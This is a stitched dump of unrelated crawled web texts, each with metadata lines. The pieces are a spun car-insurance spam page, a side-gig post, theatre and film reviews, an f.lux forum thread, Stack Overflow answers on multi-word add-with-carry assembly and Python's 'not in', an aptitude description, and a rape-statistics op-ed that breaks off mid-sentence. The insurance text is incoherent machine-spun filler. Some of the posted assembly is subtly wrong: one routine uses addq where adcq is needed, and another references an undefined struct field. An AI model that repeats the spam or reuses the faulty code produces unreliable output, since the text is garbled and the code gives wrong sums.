Primarily, those making claims of any kind of an accident that is why ensuring a high speed and acceleration from important factors is equally unfair. If you don't want to draw the line at paying attention to the brush on the extra mile on your location, DOB. Before shopping for your insurance coverage. The answer is a simple solution to your individual requirements.
These are the banks and do it themselves and their plans are also other mishaps can be done by using bullet points and other such factors, then your task, to pick from, and decide on one of the road as often as you work out how you compare all the time. People look forward to higher insurance rate. There might not be as little as a result of actions beyond your control of your expenses to be no gaps in your insurance company than by car - the company you may notice that the risk, but an insurance policy is going to be saved. Given the seemingly endless number of uninsured drivers cover that you can choose to offer you higher premiums as well as their us agency car insurance Killeen TX policies to avoid availing of features are needed to stay with your carrier so that they can afford to replace but if you do. If so, then they are recognized to have liability for maintaining an insurance company's bottom line profits, if their employees and their contents should they be involved in a garage or other secure area. This feature can help your young driver. Just consider some statistics that have impressive page ranking and steady traffic. Some people like the concept of breakdown cover when you bring up a single policy for yourself such as New Hampshire or Wisconsin, you are mostly, if not all insurers want to end up in what follows is a migraine waiting to happen.
If you don't want to shop around online - use price. Get multiple quotes from different companies and packages on offer. And its renewal is quite a few dollars by applying for a huge legal and ruins lives. You will be there when you use such an us agency car insurance Killeen TX each year.
Cheap car insurance Largo, FL | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '4', 'language_id_whole_page_fasttext': "{'en': 0.9651862382888794}", 'metadata': "{'Content-Length': '7812', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:EGN27XV275AVSRGLIHUQ7YJE5YRVIDZQ', 'WARC-Concurrent-To': '<urn:uuid:4d671ae6-8c00-4efb-ac42-884f2fd7500c>', 'WARC-Date': datetime.datetime(2020, 2, 22, 13, 47, 51), 'WARC-IP-Address': '188.241.114.236', 'WARC-Identified-Payload-Type': 'application/xhtml+xml', 'WARC-Payload-Digest': 'sha1:DCOOBYINJ45PCFTO3AF6DVWHZFCCPIDV', 'WARC-Record-ID': '<urn:uuid:fb8a7cb0-233c-4bb3-b5d6-54bae433a07c>', 'WARC-Target-URI': 'http://greenecobiolca.com/TX/Killeen/us-agency-car-insurance/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:42d3fdc7-1be3-444e-8a43-3d3c047ca3ff>', 'WARC-Truncated': None}", 'previous_word_count': '457', 'url': 'http://greenecobiolca.com/TX/Killeen/us-agency-car-insurance/', 'warcinfo': 'isPartOf: CC-MAIN-2020-10\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for February 2020\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-128.ec2.internal\r\nsoftware: Apache Nutch 1.16 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.09260159730911255', 'original_id': '5dd4bb2cec51158ae10617ca14aaa6512a10ca616b6a7e0a84d2e93c35a3a0c6'} |
What's your side gig to make money
How do you make extra money? Uber driver, baby sit….we’ll if you are looking for something there are times you just need to think outside of the box. One of those ideas, pick up some stuff for reasonable prices at garage sales and flip it for some extra money. Another item on the list is flipping musical instruments and another was flipping Lego sets. I don’t know why I didn’t think of these things myself. See what other people are doing HERE!
Content Goes Here | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9533065557479858}", 'metadata': "{'Content-Length': '84217', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:W7I6LNZFYL5IW6ABCIK6RKZVLQGMHLU4', 'WARC-Concurrent-To': '<urn:uuid:e369834f-9c31-427c-b124-8336753cc07a>', 'WARC-Date': datetime.datetime(2019, 2, 16, 15, 14, 40), 'WARC-IP-Address': '151.101.250.25', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:DDKEX5MJZAPQGL2GNWBPN2KBRLKNXDVW', 'WARC-Record-ID': '<urn:uuid:24e9a97a-0d93-4da2-afd1-2ea906f189c5>', 'WARC-Target-URI': 'https://now1051.iheart.com/content/2018-04-24-whats-your-side-gig-to-make-money/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:559ce47d-905e-472b-8fb4-b2136ac48958>', 'WARC-Truncated': None}", 'previous_word_count': '93', 'url': 'https://now1051.iheart.com/content/2018-04-24-whats-your-side-gig-to-make-money/', 'warcinfo': 'isPartOf: CC-MAIN-2019-09\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for February 2019\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-159-135-91.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.6422886252403259', 'original_id': 'a1ebd93a4144093c5ed98585d9d5426687c196b40988e654b0bb08e3ce9305d2'} |
An historic pub in the winding streets of old Hampstead – what could be a more apt venue for The Signalman, Dickens’ short tale of the supernatural? Descending to the barely lit vaults below, wreathed in mist, you sit in apprehension as weird music and groans greet your ears. But don’t panic as that’s about as scary as it gets.
The Signalman of the title (Anthony Cord) works in a dark and dreary railway cutting leading to a tunnel. A Traveller (Joshy Connor) comes to visit him and notices the Signalman seems preoccupied. He agrees to explain why if the Traveller will return. The next day he reveals that he has twice seen a spectre at the tunnel entrance and each sighting was followed by a tragedy. He has seen the spectre again in the past week and is filled with dread. The Traveller doubts his story and suggests he see a doctor. Returning for a third time he finds that the Signalman’s sense of impending doom was well-founded.
The original story is based on Dickens’ own experience of a train crash and is narrated by the traveller. Dickens knew how to make his stories and characters leap off the page. But to make this story work as a play inventive dramatisation is needed. Otherwise it risks being two people standing talking about events that happened in the past. Sadly this version does not avoid that pitfall. The play fails to convey the strangeness of the tale and the cast struggle to find the emotions to give it depth. However, the venue – The Duke of Hamilton – one of the area’s last remaining real pubs, has loads of atmosphere. Dickens would likely have loved it.
- Louise Gooding | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9684192538261414}", 'metadata': "{'Content-Length': '80656', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:QBUOVNUWH63OHNPABSGHCGFOCFXWGEBJ', 'WARC-Concurrent-To': '<urn:uuid:0a2703be-6d6b-40b8-9d4a-8725a26ba8fa>', 'WARC-Date': datetime.datetime(2017, 8, 17, 19, 48, 9), 'WARC-IP-Address': '104.25.147.100', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:44XLFUAFWJCPCTGFRK77NQXUIWB5MY3R', 'WARC-Record-ID': '<urn:uuid:46ab2cc4-c1f4-4ab7-8384-832d5043b9e4>', 'WARC-Target-URI': 'http://www.whatsonstage.com/off-west-end-theatre/reviews/03-2012/the-signalman_4966.html?cid=news-ticker', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:77ed60b9-bec3-437b-be47-8d64096683a8>', 'WARC-Truncated': 'length'}", 'previous_word_count': '283', 'url': 'http://www.whatsonstage.com/off-west-end-theatre/reviews/03-2012/the-signalman_4966.html?cid=news-ticker', 'warcinfo': 'robots: classic\r\nhostname: ip-10-166-68-32.ec2.internal\r\nsoftware: Nutch 1.6 (CC)\r\nisPartOf: CC-MAIN-2017-34\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for August 2017\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.0519598126411438', 'original_id': '5512a9dddcc07cbd0106d610f2cb0f39eaf89dc8433f96cede051abea7929662'} |
Friday, November 27, 2009
Review - Thirst
A devoted priest volunteers for a medical experiment trying to eradicate a deadly virus from a small village. The virus quickly takes hold of him and after a faulty blood transfusion of infected blood, the priest is turned into something he never expected, a vampire. Struggling with his new carnal lust for blood and his dissent of faith, the priest begins to question his humanity. The priest is tested further when he falls for an old friend's wife, who is lost in her marriage and seeking a way out.
Let's be straight, Vampires are becoming a tired genre. Too may of the released vampire films are just a dime a dozen. Retreading a tired story over and over, but Park Chan-Wook's "Thirst," is a break in the mold and a excellent spin on the lore of vampires.
Written and directed by Park Chan-Wook, "Thirst" is very much a slow burn. The film trickles along slowly building the story of a priest who is turned into a vampire. That doesn't mean however, than Park Chan-Wook takes along time turning Priest Sang-Hyeon. Instead he weaves the priest's plight as a vampire into a wonderfully engaging story. The thriller drama focuses between Sang-Hyeon's carnal desire for blood and his longing to help people. The human and priest within him still have a desire to help, while the vampire and virus within compels him to feed. A result of which is absolutely enthralling to watch unfold on screen.
The film also follows Tae-Ju and her desire to be unbound from her mundane life and husband. Drawn in by Tae-Ju's longing and sexual appetite, Sang-Hyeon begins to abandon his vows of celibacy and minstrel ways. Both Tae-Ju and Sang-Hyeon's character development is astonishing. They are polar opposites. One hates the virus within himself, while the other longs for the carnal desire. Their combined thirst and how each one copes with the vampire virus is just as engaging as the initial concept scripted by Park Chan-Wook, if not more so.
Park Chan-Wook deserves a ton of credit in creating such amazing characters within his script, but Song Kang-Ho and Kim Ok-Vin are phenomenal in their roles. What is so impressive in their performances, is their vast differences in dealing with the virus. Both actors undergo huge transitions in their performances, but Kim Ok-Vin as Tae-Ju is staggering. She goes form an individual who is lost to becoming empowered. I was awestruck by her performance and transitions. That is not to say Song Kang-Ho is not powerful as Priest Sang-Hyeon. Kang-Ho most definitely carries the film, he is just out shined by moments of genius by Kim Ok-Vin.
"Thirst" by any means has a very offbeat tone to it. The family of Tae-Ju is quite comical, especially her husband Kang-Woo and mother Lady Ra. Despite a quirky overtone, "Thirst" remains very much an unsettling and serious film. It becomes very clear that Park Chan-Wook is not toying with the mythology of vampires, but instead divulging his well thought out ideas on the genre. I really connected with the thoughtful and intricate script and characters he created, as I would wager most vampires fans would.
Park Chan-Wook took the idea of vampires and very much made it his own, which is a wonderful change compared to the typical films in the genre. The film is erotic, eerie, thought-provoking and most of all a wonderfully executed. I felt that each act moved as it's own entity, while at the same time, being connected to the overall story. Truthfully, I was uncertain where Chan-Wook's story would lead, but was endlessly compelled by the intense finish. Ultimately, the combination of Park Chan-Wook's unsettling tone and exhilarating spin of the mythos of vampires makes "Thirst" a film not to be missed in 2009. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9811431169509888}", 'metadata': "{'Content-Length': '114463', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:X3MZ726RZ4LDJQLWB7ZXBIAPGQ5DBMQ3', 'WARC-Concurrent-To': '<urn:uuid:85a696cd-eb18-4e87-bcd2-2da952109e85>', 'WARC-Date': datetime.datetime(2019, 3, 23, 1, 19, 31), 'WARC-IP-Address': '172.217.15.115', 'WARC-Identified-Payload-Type': 'application/xhtml+xml', 'WARC-Payload-Digest': 'sha1:Q3FPNX7HBCPJ3SMKYXMKAKRJLWZLU3LW', 'WARC-Record-ID': '<urn:uuid:fb7b052f-1944-44cb-ad16-79914c5244b0>', 'WARC-Target-URI': 'http://www.schofizzy.com/2009/11/review-thirst.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:0bd10cc1-92f7-4045-83e0-4f0e5e08e5d9>', 'WARC-Truncated': None}", 'previous_word_count': '630', 'url': 'http://www.schofizzy.com/2009/11/review-thirst.html', 'warcinfo': 'isPartOf: CC-MAIN-2019-13\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for March 2019\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-101-182-190.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.08574151992797852', 'original_id': 'ec75758e7cbd74b5dc7a313c633522ec616f31f1385a76bf23218518e1e0f099'} |
What light is used in the fluxometer software page picture?
• I see the graph has a full spectrum and a spike in the blue region. If this is an led source I'd like to know where to buy it.
• f.lux team
Actual daylight plus some 5000K LED. :)
• @herf that led or leds still have a blue spike. SORAA is cool as they can start with violet light and get more blue range and they do great with all the other colors so far.
• @herf Isee you're very involved with the forum--I can't help much with mac questions, but when you get a chance, I'd like to know the best 5500-6500K cfl (26w size or less) and T5 preferably as I have fixtures, or T8 bulbs with a color spectrum similar to Philips tl950 but with more blue light too.
I've seen online the Kino Flo tubes--can't use a single one of them as none use standard T5 base with 4ft (that combination). The CFL bulbs seem to drop down the blue too much and will probably have a strange color tint of minty blue green. Are you aware of higher quality CFL bulbs? | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.960621416568756}", 'metadata': "{'Content-Length': '39890', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:Y7BK4ECVP2JOMZAGW5AW27IKEXSZHMRS', 'WARC-Concurrent-To': '<urn:uuid:2e76f9c4-016e-4c52-9fd2-8a1910a58ebb>', 'WARC-Date': datetime.datetime(2019, 6, 16, 4, 1, 48), 'WARC-IP-Address': '216.176.200.22', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:WFVXIKJXPQXHG4V2HCSF4VFOUWMDBSQF', 'WARC-Record-ID': '<urn:uuid:272f9230-1794-47f6-8045-b7562dd672aa>', 'WARC-Target-URI': 'https://forum.justgetflux.com/topic/6527/what-light-is-used-in-the-fluxometer-software-page-picture/2', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:e49012cb-e0a3-4a6c-838f-1c0013fe1cb3>', 'WARC-Truncated': None}", 'previous_word_count': '189', 'url': 'https://forum.justgetflux.com/topic/6527/what-light-is-used-in-the-fluxometer-software-page-picture/2', 'warcinfo': 'isPartOf: CC-MAIN-2019-26\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for June 2019\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-187-26-184.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.024399399757385254', 'original_id': 'a44763517b5b008dd83a0ee84d4293bf9ba92628677b9e692c316b97ca1d3d17'} |
Q:
Producing good add with carry code from clang
I'm trying to produce code (currently using clang++-3.8) that adds two numbers consisting of multiple machine words. To simplify things for the moment I'm only adding 128bit numbers, but I'd like to be able to generalise this.
First some typedefs:
typedef unsigned long long unsigned_word;
typedef __uint128_t unsigned_128;
And a "result" type:
struct Result
{
unsigned_word lo;
unsigned_word hi;
};
The first function, f, takes two pairs of unsigned words and returns a result, by as an intermediate step putting both of these 64 bit words into a 128 bit word before adding them, like so:
Result f (unsigned_word lo1, unsigned_word hi1, unsigned_word lo2, unsigned_word hi2)
{
Result x;
unsigned_128 n1 = lo1 + (static_cast<unsigned_128>(hi1) << 64);
unsigned_128 n2 = lo2 + (static_cast<unsigned_128>(hi2) << 64);
unsigned_128 r1 = n1 + n2;
x.lo = r1 & ((static_cast<unsigned_128>(1) << 64) - 1);
x.hi = r1 >> 64;
return x;
}
This actually gets inlined quite nicely like so:
movq 8(%rsp), %rsi
movq (%rsp), %rbx
addq 24(%rsp), %rsi
adcq 16(%rsp), %rbx
Now, instead I've written a simpler function using the clang multi-precision primatives, as below:
static Result g (unsigned_word lo1, unsigned_word hi1, unsigned_word lo2, unsigned_word hi2)
{
Result x;
unsigned_word carryout;
x.lo = __builtin_addcll(lo1, lo2, 0, &carryout);
x.hi = __builtin_addcll(hi1, hi2, carryout, &x.carry);
return x;
}
This produces the following assembly:
movq 24(%rsp), %rsi
movq (%rsp), %rbx
addq 16(%rsp), %rbx
addq 8(%rsp), %rsi
adcq $0, %rbx
In this case, there's an extra add. Instead of doing an ordinary add on the lo-words, then an adc on the hi-words, it just adds the hi-words, then adds the lo-words, then does an adc on the hi-word again with an argument of zero.
This may not look too bad, but when you try this with larger words (say 192bit, 256bit) you soon get a mess of ors and other instructions dealing with the carries up the chain, instead of a simple chain of add, adc, adc, ... adc.
The multi-precision primitives seem to be doing a terrible job at exactly what they're intended to do.
So what I'm looking for is code that I could generalise to any length (no need to do it, just enough so I can work out how to), which clang produces additions in an manner with is as efficient as what it does with it's built in 128 bit type (which unfortunately I can't easily generalise). I presume this should just a chain of adcs, but I'm welcome to arguments and code that it should be something else.
A:
There is an intrinsic to do this: _addcarry_u64. However, only Visual Studio and ICC (at least VS 2013 and 2015 and ICC 13 and ICC 15) do this efficiently. Clang 3.7 and GCC 5.2 still don't produce efficient code with this intrinsic.
Clang in addition has a built-in which one would think does this, __builtin_addcll, but it does not produce efficient code either.
The reason Visual Studio does this is that it does not allow inline assembly in 64-bit mode so the compiler should provide a way to do this with an intrinsic (though Microsoft took their time implementing this).
Therefore, with Visual Studio use _addcarry_u64. With ICC use _addcarry_u64 or inline assembly. With Clang and GCC use inline assembly.
Note that since the Broadwell microarchitecture there are two new instructions: adcx and adox which you can access with the _addcarryx_u64 intrinsic . Intel's documentation for these intrinsics used to be different then the assembly produced by the compiler but it appears their documentation is correct now. However, Visual Studio still only appears to produce adcx with _addcarryx_u64 whereas ICC produces both adcx and adox with this intrinsic. But even though ICC produces both instructions it does not produce the most optimal code (ICC 15) and so inline assembly is still necessary.
Personally, I think the fact that a non-standard feature of C/C++, such as inline assembly or intrinsics, is required to do this is a weakness of C/C++ but others might disagree. The adc instruction has been in the x86 instruction set since 1979. I would not hold my breath on C/C++ compilers being able to optimally figure out when you want adc. Sure they can have built-in types such as __int128 but the moment you want a larger type that's not built-in you have to use some non-standard C/C++ feature such as inline assembly or intrinsics.
In terms of inline assembly code to do this I already posted a solution for 256-bit addition for eight 64-bit integers in register at multi-word addition using the carry flag.
Here is that code reposted.
#define ADD256(X1, X2, X3, X4, Y1, Y2, Y3, Y4) \
__asm__ __volatile__ ( \
"addq %[v1], %[u1] \n" \
"adcq %[v2], %[u2] \n" \
"adcq %[v3], %[u3] \n" \
"adcq %[v4], %[u4] \n" \
: [u1] "+&r" (X1), [u2] "+&r" (X2), [u3] "+&r" (X3), [u4] "+&r" (X4) \
: [v1] "r" (Y1), [v2] "r" (Y2), [v3] "r" (Y3), [v4] "r" (Y4))
If you want to explicitly load the values from memory you can do something like this
//uint64_t dst[4] = {1,1,1,1};
//uint64_t src[4] = {1,2,3,4};
asm (
"movq (%[in]), %%rax\n"
"addq %%rax, %[out]\n"
"movq 8(%[in]), %%rax\n"
"adcq %%rax, 8%[out]\n"
"movq 16(%[in]), %%rax\n"
"adcq %%rax, 16%[out]\n"
"movq 24(%[in]), %%rax\n"
"adcq %%rax, 24%[out]\n"
: [out] "=m" (dst)
: [in]"r" (src)
: "%rax"
);
That produces nearlly identical assembly as from the following function in ICC
void add256(uint256 *x, uint256 *y) {
unsigned char c = 0;
c = _addcarry_u64(c, x->x1, y->x1, &x->x1);
c = _addcarry_u64(c, x->x2, y->x2, &x->x2);
c = _addcarry_u64(c, x->x3, y->x3, &x->x3);
_addcarry_u64(c, x->x4, y->x4, &x->x4);
}
I have limited experience with GCC inline assembly (or inline assembly in general - I usually use an assembler such as NASM) so maybe there are better inline assembly solutions.
So what I'm looking for is code that I could generalize to any length
To answer this question here is another solution using template meta programming. I used this same trick for loop unrolling. This produces optimal code with ICC. If Clang or GCC ever implement _addcarry_u64 efficiently this would be a good general solution.
#include <x86intrin.h>
#include <inttypes.h>
#define LEN 4 // N = N*64-bit add e.g. 4=256-bit add, 3=192-bit add, ...
static unsigned char c = 0;
template<int START, int N>
struct Repeat {
static void add (uint64_t *x, uint64_t *y) {
c = _addcarry_u64(c, x[START], y[START], &x[START]);
Repeat<START+1, N>::add(x,y);
}
};
template<int N>
struct Repeat<LEN, N> {
static void add (uint64_t *x, uint64_t *y) {}
};
void sum_unroll(uint64_t *x, uint64_t *y) {
Repeat<0,LEN>::add(x,y);
}
Assembly from ICC
xorl %r10d, %r10d #12.13
movzbl c(%rip), %eax #12.13
cmpl %eax, %r10d #12.13
movq (%rsi), %rdx #12.13
adcq %rdx, (%rdi) #12.13
movq 8(%rsi), %rcx #12.13
adcq %rcx, 8(%rdi) #12.13
movq 16(%rsi), %r8 #12.13
adcq %r8, 16(%rdi) #12.13
movq 24(%rsi), %r9 #12.13
adcq %r9, 24(%rdi) #12.13
setb %r10b
Meta programming is a basic feature of assemblers so it's too bad C and C++ (except through template meta programming hacks) have no solution for this either (the D language does).
The inline assembly I used above which referenced memory was causing some problems in a function. Here is a new version which seems to work better
void foo(uint64_t *dst, uint64_t *src)
{
__asm (
"movq (%[in]), %%rax\n"
"addq %%rax, (%[out])\n"
"movq 8(%[in]), %%rax\n"
"adcq %%rax, 8(%[out])\n"
"movq 16(%[in]), %%rax\n"
"addq %%rax, 16(%[out])\n"
"movq 24(%[in]), %%rax\n"
"adcq %%rax, 24(%[out])\n"
:
: [in] "r" (src), [out] "r" (dst)
: "%rax"
);
}
| mini_pile | {'original_id': '36140c92bc57363a260f614bbff21abd491dcf2d1cfdf87882129a1a4f62999e'} |
Aptitude: Mental, Perceptual, Sensory/Physical
F Mental/Sensory Skills in Handling Fine Details: talented mental/sensory/physical ability to work with fine detail, close tolerances, very accurate pinpointing of specific functions (such as working on computer chips or connecting wires of phone cables). In addition to the skills, a high rating here indicates tolerance of routine, willingness to concentrate for a long time, and ability to work apart from others if necessary.
Mental/sensory skills in handling fine detail requiring the ability to accurately and efficiently handle small objects and detail with concentration, coordination, timing, rhythm, etc.
Handling fine detail could and should be called the needlepoint trait, because that identifies what is required to get a high rating:
1. ability or potential to handle and manipulate small objects rapidly and accurately;
2. excellent perception of, and concentration on detail;
3. keen visual awareness of spatial measure relative to detail;
4. nimble skills of fingers, hands, wrists, and arms;
5. durability in routine activity; and
6. tangible problem solving drive (e.g. repairing a small wrist watch).
High motivation indicates that this person has that construct of talents in order to get a high rating for this Worker Trait. With continued industry emphasis on miniaturization, this is a valuable talent.
Moderate motivation indicates that this person has the ability and potential (aptitude) to handle and manipulate small objects rapidly and accurately, with good concentration, for a considerable length of time. Although an aptitude, the only way of knowing if this trait is adequately motivated for steady handling of detail is to review all Worker Traits related to detail, concentration, keen visual awareness, extended routine, and handling of functional problems.
Low motivation indicates that this person does not want to handle minute manipulation of detail for extended periods of time. Splicing telephone wires at a switchboard installation is not this person's idea of a chosen career, nor is knitting a sweater to enter in a county fair competition. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.915867805480957}", 'metadata': "{'Content-Length': '9600', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:Q3TUHEPWRL2BOMEHWE4EEC4ZXOOPW4IZ', 'WARC-Concurrent-To': '<urn:uuid:ad757aa0-8255-4bf0-921a-38e12ccf765b>', 'WARC-Date': datetime.datetime(2020, 3, 30, 6, 50, 19), 'WARC-IP-Address': '173.160.126.17', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:M6GYPRWMRXHSAJSJ4GWJZ6MIW6A5HUIL', 'WARC-Record-ID': '<urn:uuid:46326d5e-f824-48fc-893e-77f6d153b1c1>', 'WARC-Target-URI': 'https://recruit.assessment.com/ReferenceManual/Aptitude?Page=3', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:e3a0c04b-a588-49dd-98f1-c2a7be488a7b>', 'WARC-Truncated': None}", 'previous_word_count': '318', 'url': 'https://recruit.assessment.com/ReferenceManual/Aptitude?Page=3', 'warcinfo': 'isPartOf: CC-MAIN-2020-16\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for March/April 2020\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-235.ec2.internal\r\nsoftware: Apache Nutch 1.16 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.16558724641799927', 'original_id': '9fe9ade8f676abe89fff1a54b0bbeab5b8c2d1a331c2d04ac6bc9dbfa90c15dc'} |
Q:
What's more efficient in Python: `key not in list` or `not key in list`?
Just found out that both syntax ways are valid.
Which is more efficient?
element not in list
Or:
not element in list
?
A:
They behave identically, to the point of producing identical byte code; they're equally efficient. That said, element not in list is usually considered preferred. PEP8 doesn't have a specific recommendation on not ... in vs. ... not in, but it does for not ... is vs. ... is not, and it prefers the latter:
Use is not operator rather than not ... is. While both expressions are functionally identical, the former is more readable and preferred.
To show equivalence in performance, a quick byte code inspection:
>>> import dis
>>> dis.dis('not x in y')
1 0 LOAD_NAME 0 (x)
2 LOAD_NAME 1 (y)
4 COMPARE_OP 7 (not in)
6 RETURN_VALUE
>>> dis.dis('x not in y')
1 0 LOAD_NAME 0 (x)
2 LOAD_NAME 1 (y)
4 COMPARE_OP 7 (not in)
6 RETURN_VALUE
| mini_pile | {'original_id': 'f92cbf911e528feae9b6628798eb23baec6a0218533b50f2e0d98cbadd9d329a'} |
You are here
Sunday, May 25, 2014
There is no doubt about it—rape is one of the dirtiest deeds in the world. Rape, as we know it, is as old as civilisation itself. While the common definitions offered for rape is that it is sexual intercourse/taking by force/penetration, initiated by one or more people against another person without that person’s consent, this is a cut-and–dried definition that fails to really relay the physical and mental scarring that accompanies it. While we do know that in all the reported incidents of rape, sexual intercourse is carried out by physical force, coercion, and abuse of authority that by itself fails to also address the mental agony and the stigma that is associated with the victim.
What is evident, though, is that in nearly all countries of the world, reported incidents of rape have been increasing rapidly. Internet statistics reveal, for instance, that internationally the incidence of rapes recorded by the police during the year 2010 varied between 0.2 in Azerbaijan per 100,000 people, and 92.9 per 100,000 people in Botswana, with 6.3 per 100,000 people in Lithuania as the median. What is surprising, though, is that the country that ranks first for the highest reported incidence of rape is the United States of America. In 2011, for instance, 83,425 cases of rape were reported. Indeed, it is alleged that in that country every 6.2 minutes a woman is raped. In the Caribbean, too, we are not free from the scourge of rape. Indeed, 48 per cent of Caribbean girls who have had sex reported that their first encounter was “forced,” in other words, they were more or less raped. Sources have also cited a United Nations/World Bank report showing that the Caribbean has three of the top ten recorded rape rates in the world.
According to this report, the country that tops the list is the Bahamas, where the number of reported rapes is almost 15 times higher than most countries. Two other countries that have ranked in the top ten are St Vincent and the Grenadines and Jamaica. In Jamaica, in 1989, there were 1,032 reported cases of rape and carnal abuse. This figure rose to 1,297 in 1993. Thirty-eight per cent of these victims in Jamaica in 1993 were between the ages of 18 and 25, and 44 per cent of the cases were in relation to carnal abuse of girls under 16 (taken from Violence against women in the Caribbean State and Non-State Response, Unifem, 1998). Police statistics for T&T for 1991 show that a woman is raped every 1.75 days. (As of January 2014, there have been a total of 39 reported cases of rape in this country.) While there were 142 reports of rape in 1985, only 48 per cent resulted in the laying of criminal charges. No convictions of rape were reported in that year. This disparity is also observed for 1989 when there were 239 cases of rape reported, 146 (61 per cent) of which resulted in charges of rape being laid. In that year, only ten convictions were recorded. Similar trends are observable for Barbados and Guyana. Statistics for Barbados show that in 1989, 64 reports of rape were recorded, 28 charges (43 per cent) were laid and there were no convictions. In Guyana for the year 1988, 73 reports of rape were made and 39 charges (53 per cent) of rape were laid.
Date rapes silent voices
However, it should be noted that these are the cases that were actually reported. Many cases go unreported for a number of reasons. For instance, in many universities or organisations which have halls of residence there have been incidents of what is commonly known as “date rapes.” In all the cited cases, the young women knew their attacker and were often on friendly terms with him. In most of the cases, the rape occurred either in the female’s apartment or in the male’s apartment. In many cases, it was a sleepover or a study-group session. In a number of cases, it commenced as fondling and then escalated. In all the cases, the young women felt it was their fault. In many of the cases, the young women did not go to the police or a counsellor. Nor did parents or friends know of the issue. The victims felt that people would judge them as provoking the attack rather than as the victim. They believed they would be ridiculed and scorned by their peers if they knew what had happened. They were horrified at what they thought the reaction of their parents and neighbours would be.
In addition, these young females were afraid of the attitude of the police towards women. Moreover, many felt the justice system would be either lengthy or biased or would expose them to public scrutiny and ridicule. But it is not only these date rapes that go unreported. Sometimes the public gets one small peek at rapes occurring in the household and the speculation is that where there is one case exposed perhaps ten more go unreported or does not meet the eye of the public. No doubt these cases join the silent voices of many others. The issue of unreported rape cases, though, is one that should be given more attention. No doubt the justice system and the attitude of the police deter many people from reporting the incidents, but another factor should also be given serious attention, namely the society. Does society, for instance, have something to do with the way men view women? Or is it that the society places a stigma on women who are raped? Are there different yardsticks for men as opposed to women? Is it that the laxity of the laws with respect to pornography one of the many causal factors? Does the society and its impact on family life have any relationship with rape? It is evident, though, that the issue of rape, unreported as well as reported, must once more be aired thoroughly. If we fail to do so, the silent cries will continue to 